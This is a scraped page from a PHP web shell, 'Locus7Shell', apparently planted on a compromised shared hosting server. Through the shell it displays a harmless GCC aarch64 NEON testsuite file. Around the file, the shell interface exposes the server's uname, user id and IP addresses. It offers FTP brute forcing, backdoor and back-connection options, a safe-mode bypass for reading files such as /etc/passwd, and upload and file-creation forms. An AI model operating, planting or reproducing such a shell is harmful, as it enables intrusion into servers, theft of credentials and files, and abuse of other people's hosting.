Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/aarch64/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     vmul_element_cost.c (3.41 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do compile } */
/* { dg-options "-O3" } */

#include <arm_neon.h>

#define TEST_MUL_UNIFORM(name, q, vectype, ts) \
  vectype test_ ## name ## q ## _ ## ts (vectype a, vectype b, vectype c) \
    { \
        vectype t0 = name ## q ## _n_ ## ts (a, c[1]); \
        vectype t1 = name ## q ## _n_ ## ts (b, c[1]); \
        return vmul ## q ## _ ## ts (t0, t1); \
    }

TEST_MUL_UNIFORM (vmul, , int16x4_t, s16)
TEST_MUL_UNIFORM (vmul, , uint16x4_t, u16)
TEST_MUL_UNIFORM (vmul, , int32x2_t, s32)
TEST_MUL_UNIFORM (vmul, , uint32x2_t, u32)
TEST_MUL_UNIFORM (vmul, , float32x2_t, f32)
TEST_MUL_UNIFORM (vmul, q, int16x8_t, s16)
TEST_MUL_UNIFORM (vmul, q, uint16x8_t, u16)
TEST_MUL_UNIFORM (vmul, q, int32x4_t, s32)
TEST_MUL_UNIFORM (vmul, q, uint32x4_t, u32)
TEST_MUL_UNIFORM (vmul, q, float32x4_t, f32)
TEST_MUL_UNIFORM (vmul, q, float64x2_t, f64)

#define TEST_MLX_UNIFORM(name, q, vectype, ts) \
  vectype test_ ## name ## q ## _ ## ts (vectype acc, vectype a, vectype b) \
    { \
        acc = name ## q ## _n_ ## ts (acc, a, b[1]); \
        return name ## q ## _n_ ## ts (acc, a, b[1]); \
    }

TEST_MLX_UNIFORM (vmla, , int16x4_t, s16)
TEST_MLX_UNIFORM (vmla, , uint16x4_t, u16)
TEST_MLX_UNIFORM (vmla, , int32x2_t, s32)
TEST_MLX_UNIFORM (vmla, , uint32x2_t, u32)
TEST_MLX_UNIFORM (vmla, , float32x2_t, f32)
TEST_MLX_UNIFORM (vmla, q, int16x8_t, s16)
TEST_MLX_UNIFORM (vmla, q, uint16x8_t, u16)
TEST_MLX_UNIFORM (vmla, q, int32x4_t, s32)
TEST_MLX_UNIFORM (vmla, q, uint32x4_t, u32)
TEST_MLX_UNIFORM (vmla, q, float32x4_t, f32)

TEST_MLX_UNIFORM (vmls, , int16x4_t, s16)
TEST_MLX_UNIFORM (vmls, , uint16x4_t, u16)
TEST_MLX_UNIFORM (vmls, , int32x2_t, s32)
TEST_MLX_UNIFORM (vmls, , uint32x2_t, u32)
TEST_MLX_UNIFORM (vmls, , float32x2_t, f32)
TEST_MLX_UNIFORM (vmls, q, int16x8_t, s16)
TEST_MLX_UNIFORM (vmls, q, uint16x8_t, u16)
TEST_MLX_UNIFORM (vmls, q, int32x4_t, s32)
TEST_MLX_UNIFORM (vmls, q, uint32x4_t, u32)
TEST_MLX_UNIFORM (vmls, q, float32x4_t, f32)

#define TEST_MUL_LONG(name, rettype, intype, ts, rs) \
  rettype test_ ## name ## ts (intype a, intype b, intype c) \
    { \
        rettype t0 = name ## ts (a, c[1]); \
        rettype t1 = name ## ts (b, c[1]); \
        return vqaddq ## _ ## rs (t0, t1); \
    }

TEST_MUL_LONG (vmull_n_, int32x4_t, int16x4_t, s16, s32)
TEST_MUL_LONG (vmull_n_, uint32x4_t, uint16x4_t, u16, u32)
TEST_MUL_LONG (vmull_n_, int64x2_t, int32x2_t, s32, s64)
TEST_MUL_LONG (vmull_n_, uint64x2_t, uint32x2_t, u32, u64)

TEST_MUL_LONG (vqdmull_n_, int32x4_t, int16x4_t, s16, s32)
TEST_MUL_LONG (vqdmull_n_, int64x2_t, int32x2_t, s32, s64)

#define TEST_MLX_LONG(name, rettype, intype, ts, rs) \
  rettype test_ ## name ## _ ## ts (rettype acc, intype a, intype b) \
    { \
        acc = name ## ts (acc, a, b[1]); \
        return name ## ts (acc, a, b[1]); \
    }

TEST_MLX_LONG (vmlal_n_, int32x4_t, int16x4_t, s16, s32)
TEST_MLX_LONG (vmlal_n_, uint32x4_t, uint16x4_t, u16, u32)
TEST_MLX_LONG (vmlal_n_, int64x2_t, int32x2_t, s32, s64)
TEST_MLX_LONG (vmlal_n_, uint64x2_t, uint32x2_t, u32, u64)

TEST_MLX_LONG (vmlsl_n_, int32x4_t, int16x4_t, s16, s32)
TEST_MLX_LONG (vmlsl_n_, uint32x4_t, uint16x4_t, u16, u32)
TEST_MLX_LONG (vmlsl_n_, int64x2_t, int32x2_t, s32, s64)
TEST_MLX_LONG (vmlsl_n_, uint64x2_t, uint32x2_t, u32, u64)

TEST_MLX_LONG (vqdmlal_n_, int32x4_t, int16x4_t, s16, s32)
TEST_MLX_LONG (vqdmlal_n_, int64x2_t, int32x2_t, s32, s64)

TEST_MLX_LONG (vqdmlsl_n_, int32x4_t, int16x4_t, s16, s32)
TEST_MLX_LONG (vqdmlsl_n_, int64x2_t, int32x2_t, s32, s64)

/* { dg-final { scan-assembler-not "dup\\t" } } */

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0057 ]--